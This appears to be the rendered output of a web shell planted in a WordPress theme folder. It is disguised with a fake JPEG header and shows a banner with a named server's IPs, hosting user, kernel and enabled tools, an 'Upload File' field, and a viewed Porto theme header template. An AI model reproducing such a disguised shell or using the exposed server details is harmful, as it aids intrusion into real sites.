���� JFIF fdasasfas213sdaf
Server IP : 88.222.243.169 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/essartindia.com/public_html/wp-content/themes/porto/ |
Upload File : |
<?php /** * Blank template for backward compatibility with 6.5.0 * * @since 6.6.0 */ global $porto_settings, $porto_settings_optimize; // For Favicon if ( $porto_settings['favicon'] ) : ?> <link rel="shortcut icon" href="<?php echo esc_url( str_replace( array( 'http:', 'https:' ), '', $porto_settings['favicon']['url'] ) ); ?>" type="image/x-icon" /> <?php endif; // For iPhone if ( $porto_settings['icon-iphone'] ) : ?> <link rel="apple-touch-icon" href="<?php echo esc_url( str_replace( array( 'http:', 'https:' ), '', $porto_settings['icon-iphone']['url'] ) ); ?>" /> <?php endif; // For iPhone Retina if ( $porto_settings['icon-iphone-retina'] ) : ?> <link rel="apple-touch-icon" sizes="120x120" href="<?php echo esc_url( str_replace( array( 'http:', 'https:' ), '', $porto_settings['icon-iphone-retina']['url'] ) ); ?>" /> <?php endif; // For iPad if ( $porto_settings['icon-ipad'] ) : ?> <link rel="apple-touch-icon" sizes="76x76" href="<?php echo esc_url( str_replace( array( 'http:', 'https:' ), '', $porto_settings['icon-ipad']['url'] ) ); ?>" /> <?php endif; // For iPad Retina if ( $porto_settings['icon-ipad-retina'] ) : ?> <link rel="apple-touch-icon" sizes="152x152" href="<?php echo esc_url( str_replace( array( 'http:', 'https:' ), '', $porto_settings['icon-ipad-retina']['url'] ) ); ?>" /> <?php endif; if ( isset( $porto_settings_optimize['preload'] ) ) { if ( in_array( 'porto', $porto_settings_optimize['preload'] ) ) { echo '<link rel="preload" href="' . PORTO_URI . '/fonts/porto-font/porto.woff2" as="font" type="font/woff2" crossorigin />'; } $font_awesome_font = ! empty( $porto_settings_optimize['optimize_fontawesome'] ) ? 'fontawesome_optimized' : 'fontawesome'; if ( in_array( 'fas', $porto_settings_optimize['preload'] ) ) { echo '<link rel="preload" href="' . PORTO_URI . '/fonts/' . $font_awesome_font . '/fa-solid-900.woff2" as="font" type="font/woff2" crossorigin />'; } if ( in_array( 'far', $porto_settings_optimize['preload'] ) ) { echo '<link rel="preload" href="' . PORTO_URI . '/fonts/' . $font_awesome_font . '/fa-regular-400.woff2" as="font" type="font/woff2" crossorigin />'; } if ( in_array( 'fab', $porto_settings_optimize['preload'] ) ) { echo '<link rel="preload" href="' . PORTO_URI . '/fonts/' . $font_awesome_font . '/fa-brands-400.woff2" as="font" type="font/woff2" crossorigin />'; } if ( in_array( 'sli', $porto_settings_optimize['preload'] ) ) { echo '<link rel="preload" href="' . PORTO_URI . '/fonts/Simple-Line-Icons/Simple-Line-Icons.ttf" as="font" type="font/ttf" crossorigin />'; } } if ( ! empty( $porto_settings_optimize['preload_custom'] ) ) { $font_urls = explode( PHP_EOL, $porto_settings_optimize['preload_custom'] ); foreach ( $font_urls as $font_url ) { $dot_pos = strrpos( $font_url, '.' ); if ( false !== $dot_pos ) { $type = substr( $font_url, $dot_pos + 1 ); $font_type = array( 'ttf', 'woff', 'woff2', 'eot' ); $image_type = array( 'jpg', 'jpeg', 'png', 'svg', 'gif', 'webp' ); if ( in_array( $type, $font_type ) ) { echo '<link rel="preload" href="' . esc_url( $font_url ) . '" as="font" type="font/' . esc_attr( $type ) . '" crossorigin />'; } elseif ( in_array( $type, $image_type ) ) { echo '<link rel="preload" href="' . esc_url( $font_url ) . '" as="image" />'; } else { echo '<link rel="preload" href="' . esc_url( $font_url ) . '" />'; } } } } wp_head();